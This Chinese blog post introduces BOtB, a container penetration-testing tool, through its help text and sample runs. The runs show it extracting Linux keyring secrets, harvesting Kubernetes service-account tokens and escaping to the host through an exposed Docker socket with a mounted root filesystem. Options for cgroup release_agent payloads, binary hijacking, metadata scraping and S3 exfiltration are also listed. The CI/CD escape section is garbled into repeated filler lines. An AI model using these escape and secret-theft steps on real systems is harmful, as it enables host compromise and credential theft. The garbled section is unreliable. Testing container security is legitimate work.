正文

【神兵利器】容器安全评估工具

admin
admin V管理员 /0 评论 /80 阅读
1203
此篇文章发布距今已超过114天,您需要注意文章的内容或图片是否可用!
基本介绍
BOtB是一个容器分析和开发工具,旨在供pentesters和工程师使用,同时也是通用CI/CD技术的CI/CD友好工具
功能模块

BOtB是一个CLI工具,它允许您:

  • 利用常见的容器漏洞

  • 执行常见的容器利用后操作

  • 当某些工具或二进制文件在容器中不可用时提供功能

  • 使用BOtB的能力和CI/CD技术来测试容器部署

  • 以手动或自动方式执行上述操作

工具使用
BOtB可以被编译成目标平台的二进制文件,并支持以下用法
./botb-linux-amd64 -h
-aggr string
        Attempt to exploit RuncPWN (default "nil")
  -always-succeed
        Always set BOtB's Exit code to Zero
  -autopwn
        Attempt to autopwn exposed sockets
  -cicd
        Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0
  -config string
        Load config from provided yaml file (default "nil")
  -endpoints string
        Provide a textfile with endpoints to use for test (default "nil")
  -find-docker
        Attempt to find Dockerd
  -find-http
        Hunt for Available UNIX Domain Sockets with HTTP
  -find-sockets
        Hunt for Available UNIX Domain Sockets
  -hijack string
        Attempt to hijack binaries on host (default "nil")
  -k8secrets
        Identify and Verify K8's Secrets
  -keyMax int
         Maximum key id range (default 100000000) and max system value is 999999999 (default 100000000)
  -keyMin int
         Minimum key id range (default 1) (default 1)
  -metadata
        Attempt to find metadata services
  -path string
        Path to Start Scanning for UNIX Domain Sockets (default "/")
  -pwn-privileged string
        Provide a command payload to try exploit --privilege CGROUP release_agent's (default "nil")
  -pwnKeyctl
        Abuse keyctl syscalls and extract data from Linux Kernel keyrings
  -recon
        Perform Recon of the Container ENV
  -region string
        Provide a AWS Region e.g eu-west-2 (default "nil")
  -rev-dns string
        Perform reverse DNS lookups on a subnet. Parameter must be in CIDR notation, e.g., -rev-dns 192.168.0.0/24 (default "nil")
  -s3bucket string
        Provide a bucket name for S3 Push (default "nil")
  -s3push string
        Push a file to S3 e.g Full command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME would be: -region eu-west-2 -s3bucket YOURBUCKET -s3push FILENAME (default "nil")
  -scrape-gcp
        Attempt to scrape the GCP metadata service
  -verbose
        Verbose output
  -wordlist string
        Provide a wordlist (default "nil")
BOtB也可以通过config参数从YAML文件加载设置
#./botb-linux-amd64 -config=cfg.yml
[+] Break Out The Box
[+] Loading Config: cfg.yml
...
识别并提取没有得到适当保护的Linux内核密匙环秘密
#./botb-linux-amd64 -pwnKeyctl=true -keyMin=0 -keyMax=100000000
[+] Break Out The Box
[*] Attempting to Identify and Extract Keyring Values
[!] WARNING, this can be resource intensive and your pod/container process may be killed, iterate over min and max with 100000000 increments to be safe
[!] Subkey description for key [251133632]: user;0;0;3f010000;brompwnie_secret
[!] Output {
 "KeyId": 13738777,
 "Valid": true,
 "Name": "_ses.e326b8816c24d0ddda6c2c82ecf62ea2302a7239fce2fd104775d154a97fa3d6",
 "Type": "keyring",
 "Uid": "0",
 "Gid": "0",
 "Perms": "3f1b0000",
 "String_Content": "ufffdufffdufffdu000e",
 "Byte_Content": "wP73Dg==",
 "Comments": null,
 "Subkeys": [
  {
   "KeyId": 251133632,
   "Valid": true,
   "Name": "brompwnie_secret",
   "Type": "user",
   "Uid": "0",
   "Gid": "0",
   "Perms": "3f010000",
   "String_Content": "thetruthisialsoreallyliketrees",
   "Byte_Content": "dGhldHJ1dGhpc2lhbHNvcmVhbGx5bGlrZXRyZWVz",
   "Comments": null,
   "Subkeys": null,
   "Output": ""
  }
 ],
 "Output": ""
}
[+] Finished
识别和验证已安装的Kubernetes服务帐户机密
#./botb-linux-amd64 -k8secrets=true
[+] Break Out The Box
[*] Identifying and Verifying K8's Secrets
[!] Token found at: /var/run/secrets/kubernetes.io/serviceaccount/token
[!] Token found at: /run/secrets/kubernetes.io/serviceaccount/token
[*] Trying:  https://kubernetes.default/api/v1
[!] Valid response with token (xxxxxxxxxx...)on -> https://kubernetes.default/api/v1
[*] Trying:  https://kubernetes.default/api/v1/namespaces
[*] Trying:  https://kubernetes.default/api/v1/namespaces/default/secrets
[*] Trying:  https://kubernetes.default/api/v1/namespaces/default/pods
[*] Trying:  https://kubernetes.default/api/v1
[!] Valid response with token (xxxxxxxxxx...)on -> https://kubernetes.default/api/v1
[*] Trying:  https://kubernetes.default/api/v1/namespaces
[*] Trying:  https://kubernetes.default/api/v1/namespaces/default/secrets
[*] Trying:  https://kubernetes.default/api/v1/namespaces/default/pods
[+] Finished
通过暴露的Docker守护进程从容器中逃逸
#./bob_linux_amd64 -autopwn=true    
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn:  /var/meh
[+] Attempting to escape to host...
[+] Attempting in TTY Mode
./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh
chroot /host && clear
echo 'You are now on the underlying host'
You are now on the underlying host
/ # 
以CI/CD友好的方式进行容器逃逸
BOtB也可以通过config参数从YAML文件加载设置0
BOtB也可以通过config参数从YAML文件加载设置1
BOtB也可以通过config参数从YAML文件加载设置2
BOtB也可以通过config参数从YAML文件加载设置3
BOtB也可以通过config参数从YAML文件加载设置4
BOtB也可以通过config参数从YAML文件加载设置1
BOtB也可以通过config参数从YAML文件加载设置6
BOtB也可以通过config参数从YAML文件加载设置3
BOtB也可以通过config参数从YAML文件加载设置4
BOtB也可以通过config参数从YAML文件加载设置9

下载地址

点击下方名片进入公众号

回复关键字【241130】获取下载链接

·


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
周飒博客-ZhouSa.com